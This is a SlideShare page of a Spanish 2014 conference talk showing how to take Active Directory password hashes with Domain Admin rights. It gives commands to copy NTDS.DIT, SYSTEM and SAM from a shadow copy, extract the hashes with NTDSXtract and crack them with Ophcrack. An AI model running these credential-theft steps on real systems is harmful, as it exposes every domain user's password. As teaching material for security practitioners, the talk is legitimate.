SlideShare uma empresa Scribd logo
1 de 26
Baixar para ler offline
Como obtener contraseñas del
directorio activo con permisos
de Domain Admin
Ing. Pedro Joaquín
@_hkm
Reunión de la Comunidad Underground de México 2014
28 de junio del 2014
Advertencia
• El propósito de esta presentación es demostrar de manera práctica
una técnica conocida de obtención de las contraseñas del Directorio
Activo a partir de una cuenta con permisos de Domain Admin.
• El autor, ni la organización que representa se responsabilizan por el
mal uso que se le pueda dar a las técnicas mostradas a continuación.
• El acceso no autorizado a sistemas o equipos de computo, conocer,
copiar, modificar o destruir información, y la intervención de cuentas
de correo son delitos sancionados en el Código Penal Federal.
• Recomendamos informar a los usuarios que su contraseña puede ser
observada por los administradores de la red.
Tres simples pasos
1. Copiar los archivos NTDS.DIT y SYSTEM del controlador de dominio.
2. Extraer los hashes de los archivos.
3. Descifrar (“Crackear”) los hashes.
Tres simples pasos
1. Copiar los archivos NTDS.DIT y SYSTEM del controlador de dominio.
2. Extraer los hashes de los archivos.
3. Descifrar (“Crackear”) los hashes.
Copiar los archivos NTDS.DIT y
SYSTEM
Crear un Volume Shadow Copy,
Copiar los archivos del Volume Shadow,
Borrar la Volume Shadow Copy
NTDS.DIT y SYSTEM
NTDS.DIT
Archivo donde se almacena toda la información del directorio activo. Se
encuentra en %SystemRoot%ntdsNTDS.DIT.
SYSTEM
Contiene el registro SYSTEM el cual contiene la bootkey (SYSKEY)
necesaria para extraer los hashes del NTDS.DIT.
** Los archivos se encuentran protegidos para que no se puedan copiar
fácilmente. Es necesario extraerlos de una Volume Shadow Copy
Volume Shadow Copy
• El Volume Shadow Copy eres un sistema de respaldo de unidades de Windows
que permite crear copias de archivos ocultos como el NTDS.DIT, SYSTEM, SAM,
etc.
• Se puede utilizar el comando vssadmin list shadows para saber si existen
copias creadas:
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.
Crear una Volume Shadow Copy
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for ‘c:’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
Se utiliza el comando vssadmin create shadow /for=c: para
crear una copia de la unidad c:
Copiar los archivos del Volume Shadow Copy
• Comandos para copiar los archivos requeridos al directorio actual:
copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
[X] Es el identificador de la copia, ver diapositiva anterior.
En algunos sistemas como Windows 2003 y 2008 la ruta windows puede variar a WINNT
Para borrar la Volume Shadow Copy
C:> vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Extracción de los hashes
Extraer las tablas con libesedb
Extraer los hashes con NTDSXtract
Extracción de los hashes
• Para extraer los hashes es necesario tener la tabla database y link del
archivo NTDS.DIT y el archivo SYSTEM.
• Utilizaremos las herramientas de libesedb para extraer las tablas del
NTDS.DIR y posteriormente ntdsxtract para utilizar las tablas y el
SYSTEM para obtener los hashes.
• Estas herramientas corren en Linux.
Descarga e instalación de libesedb
# wget
http://libesedb.googlecode.com/files/libesedb-alpha-
20120102.tar.gz
# tar -xzvf libesedb-alpha-20120102.tar.gz
# cd libesedb-20120102
# ./configure
# make
# mv esedbtools/ /usr/local
# cd esedbtools/
esedbexport (parte de libesedb)
• Syntaxis:
#./esedbexport –t <directorio de salida> <archivo ntds.dit>
• Este comando tardará mucho. Aprox 25 minutos. Si en 25 minutos
parece que no esta avanzando hay que presionar Enter para
actualizarlo.
• La salida de comando debe ser similar a la siguiente diapositiva…
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
Nombres de archivos exportados
# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10
• No utilizaremos todos los
archivos, únicamente el
datatable3, link_table.4 y el
SYSTEM.
Descarga e instalación de NTDSXtract
# wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
# unzip ntdsxtract_v1_2_beta.zip
# cd ntdsxtract_v1_2_beta
Extracción de hashes
• # python dsusers.py ~/ntds.export/datatable.3
~/ntds.export/link_table.4 ~/TEMP --passwordhashes --
lmoutfile LM.out --ntoutfile NT.out --pwdformat ophc --
syshive ~/SYSTEM
• Se ejecuta un comando similar donde le estamos diciendo la ubicación del
datatable.3, link_table.4 y SYSTEM y esperando el resultado de los hashes en
formato ophc (Ophcrack). Nos generará dos archivos uno de hashes, uno para LM
LM.out y otro de hashes NT NT.out.
Descifrar (“Crackear”) los hashes
Descargando Ophcrack,
Obteniendo las Rainbow Tables,
Crackeando los hashes
Rainbow tables
• El cifrado NTLM se puede romper utilizando Rainbow Tables que son tablas
precomputadas de hashes.
• Las tablas recomendadas ya que son relativamente pequeñas y se pueden
obtener fácilmente son las XP_Special y las Vista_Special.
• Las tablas son gratuitas. El sitio oficial de las tablas es:
http://sourceforge.net/projects/ophcrack/files/tables/ pero por simplicidad de la
descarga y velocidad recomiendo utilizar los torrents de
• http://thepiratebay.se/torrent/4467431/Ophcrack_XP_Special_Tables
• http://thepiratebay.se/torrent/4403978/Ophcrack_Vista_Special_NTHASH_Table
Descargando e instalando Ophcrack
• Ophcrack puede ser utilizado como un LiveCD o desde Windows.
• Se descarga de http://ophcrack.sourceforge.net/
• En este tutorial utilizaremos la versión de Windows, la configuración
es la misma en la versión LiveCD de Linux.
• La diferencia principal es que la versión de LiveCD de Linux puede
obtener automáticamente los hashes de la computadora donde se
ejecuta.
Utilizando Ophcrack
• En el menú principal de
Ophcrack se seleccciona Load
y PWDUMP file
• Abrimos el archivo de las
contraseñas NT.out y/o
LM.out
Utilizando Ophcrack – Rainbow tables
• En el menú principal de
Ophcrack se seleccciona Tables y
posteriormente Install.
• Seleccionamos los directorios
donde se encuentran las tablas
Vista_special y XP_special.
• Se recomienda habilitar una
tabla a la vez, primero con
XP_special.
Crackeando las contraseñas
• En el menú principal de Ophcrack
seleccciona Crack.
• El proceso puede tomar varias horas,
pero el resultado vale la pena… 
Como obtener contraseñas del
directorio activo con permisos
de Domain Admin
Ing. Pedro Joaquín
@_hkm
Reunión de la Comunidad Underground de México 2014
28 de junio del 2014
Referencias
• Código Penal Federal, en materia de delitos en contra de medios o sistemas informáticos:
http://gaceta.diputados.gob.mx/Gaceta/61/2012/mar/20120328-III.html#DictamenaD2
• Getting Hashes from NTDS.dit file:
http://blog.walkerville.org/?p=486
• libesedb:
https://code.google.com/p/libesedb/
• NTDSXtract:
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
• Ophcrack:
http://ophcrack.sourceforge.net/

Mais conteúdo relacionado

Semelhante a Obtener contraseñas AD con Domain Admin

Debian Lenny Asterisk
Debian Lenny AsteriskDebian Lenny Asterisk
Debian Lenny Asteriskmanzurek
 
Trabajo windows xp
Trabajo windows xpTrabajo windows xp
Trabajo windows xpJaime_95
 
Cómo instalar windows 95
Cómo instalar windows 95Cómo instalar windows 95
Cómo instalar windows 95Alberto Prieto
 
Sistemas operativo
Sistemas operativoSistemas operativo
Sistemas operativodeicyarias1
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]RootedCON
 
Operación de sistema operativo monousiario sobre msdos
Operación de sistema operativo monousiario sobre msdosOperación de sistema operativo monousiario sobre msdos
Operación de sistema operativo monousiario sobre msdos2143663
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeezexavazquez
 
Cómo crear una distribución Linux
Cómo crear una distribución LinuxCómo crear una distribución Linux
Cómo crear una distribución LinuxMauro Parra-Miranda
 
Manual de instalacion_my_sql_sergio
Manual de instalacion_my_sql_sergioManual de instalacion_my_sql_sergio
Manual de instalacion_my_sql_sergioTecnologia
 
Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1yadiraarango
 
Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1yadiraarango
 

Semelhante a Obtener contraseñas AD con Domain Admin (20)

comandos dos1.pdf
comandos dos1.pdfcomandos dos1.pdf
comandos dos1.pdf
 
Linux
LinuxLinux
Linux
 
CarlosMuquinche
CarlosMuquincheCarlosMuquinche
CarlosMuquinche
 
Linux
LinuxLinux
Linux
 
Debian Lenny Asterisk
Debian Lenny AsteriskDebian Lenny Asterisk
Debian Lenny Asterisk
 
Linux
LinuxLinux
Linux
 
Trabajo windows xp
Trabajo windows xpTrabajo windows xp
Trabajo windows xp
 
Cómo instalar windows 95
Cómo instalar windows 95Cómo instalar windows 95
Cómo instalar windows 95
 
Estudio del caso
Estudio del casoEstudio del caso
Estudio del caso
 
Sistemas operativo
Sistemas operativoSistemas operativo
Sistemas operativo
 
Instalación ms dos
Instalación ms dosInstalación ms dos
Instalación ms dos
 
Tema 05 comandos de windows
Tema 05 comandos de windowsTema 05 comandos de windows
Tema 05 comandos de windows
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
 
Operación de sistema operativo monousiario sobre msdos
Operación de sistema operativo monousiario sobre msdosOperación de sistema operativo monousiario sobre msdos
Operación de sistema operativo monousiario sobre msdos
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeeze
 
Cómo crear una distribución Linux
Cómo crear una distribución LinuxCómo crear una distribución Linux
Cómo crear una distribución Linux
 
Manual de instalacion_my_sql_sergio
Manual de instalacion_my_sql_sergioManual de instalacion_my_sql_sergio
Manual de instalacion_my_sql_sergio
 
Utilidades de diagnostico
Utilidades de diagnosticoUtilidades de diagnostico
Utilidades de diagnostico
 
Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1
 
Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1Sistemas operativos lorena yadira1.1
Sistemas operativos lorena yadira1.1
 

Mais de Websec México, S.C.

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Websec México, S.C.
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...Websec México, S.C.
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonWebsec México, S.C.
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Websec México, S.C.
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are backWebsec México, S.C.
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeWebsec México, S.C.
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapWebsec México, S.C.
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...Websec México, S.C.
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PaleWebsec México, S.C.
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonWebsec México, S.C.
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Websec México, S.C.
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaWebsec México, S.C.
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoWebsec México, S.C.
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaWebsec México, S.C.
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónWebsec México, S.C.
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Websec México, S.C.
 

Mais de Websec México, S.C. (20)

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are back
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of Code
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon Pale
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino Calderon
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis Colunga
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 

Último

POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITMaricarmen Sánchez Ruiz
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfJulian Lamprea
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudianteAndreaHuertas24
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxLolaBunny11
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIAWilbisVega
 

Último (13)

POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
 

Obtener contraseñas AD con Domain Admin

  • 1. Como obtener contraseñas del directorio activo con permisos de Domain Admin Ing. Pedro Joaquín @_hkm Reunión de la Comunidad Underground de México 2014 28 de junio del 2014
  • 2. Advertencia • El propósito de esta presentación es demostrar de manera práctica una técnica conocida de obtención de las contraseñas del Directorio Activo a partir de una cuenta con permisos de Domain Admin. • El autor, ni la organización que representa se responsabilizan por el mal uso que se le pueda dar a las técnicas mostradas a continuación. • El acceso no autorizado a sistemas o equipos de computo, conocer, copiar, modificar o destruir información, y la intervención de cuentas de correo son delitos sancionados en el Código Penal Federal. • Recomendamos informar a los usuarios que su contraseña puede ser observada por los administradores de la red.
  • 3. Tres simples pasos 1. Copiar los archivos NTDS.DIT y SYSTEM del controlador de dominio. 2. Extraer los hashes de los archivos. 3. Descifrar (“Crackear”) los hashes.
  • 4. Tres simples pasos 1. Copiar los archivos NTDS.DIT y SYSTEM del controlador de dominio. 2. Extraer los hashes de los archivos. 3. Descifrar (“Crackear”) los hashes.
  • 5. Copiar los archivos NTDS.DIT y SYSTEM Crear un Volume Shadow Copy, Copiar los archivos del Volume Shadow, Borrar la Volume Shadow Copy
  • 6. NTDS.DIT y SYSTEM NTDS.DIT Archivo donde se almacena toda la información del directorio activo. Se encuentra en %SystemRoot%ntdsNTDS.DIT. SYSTEM Contiene el registro SYSTEM el cual contiene la bootkey (SYSKEY) necesaria para extraer los hashes del NTDS.DIT. ** Los archivos se encuentran protegidos para que no se puedan copiar fácilmente. Es necesario extraerlos de una Volume Shadow Copy
  • 7. Volume Shadow Copy • El Volume Shadow Copy eres un sistema de respaldo de unidades de Windows que permite crear copias de archivos ocultos como el NTDS.DIT, SYSTEM, SAM, etc. • Se puede utilizar el comando vssadmin list shadows para saber si existen copias creadas: C:>vssadmin list shadows vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001 Microsoft Corp. No items found that satisfy the query.
  • 8. Crear una Volume Shadow Copy C:>vssadmin create shadow /for=c: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001 Microsoft Corp. Successfully created shadow copy for ‘c:’ Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3} Shadow Copy Volume Name: ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1 Se utiliza el comando vssadmin create shadow /for=c: para crear una copia de la unidad c:
  • 9. Copiar los archivos del Volume Shadow Copy • Comandos para copiar los archivos requeridos al directorio actual: copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit . copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM . copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM . [X] Es el identificador de la copia, ver diapositiva anterior. En algunos sistemas como Windows 2003 y 2008 la ruta windows puede variar a WINNT
  • 10. Para borrar la Volume Shadow Copy C:> vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
  • 11. Extracción de los hashes Extraer las tablas con libesedb Extraer los hashes con NTDSXtract
  • 12. Extracción de los hashes • Para extraer los hashes es necesario tener la tabla database y link del archivo NTDS.DIT y el archivo SYSTEM. • Utilizaremos las herramientas de libesedb para extraer las tablas del NTDS.DIR y posteriormente ntdsxtract para utilizar las tablas y el SYSTEM para obtener los hashes. • Estas herramientas corren en Linux.
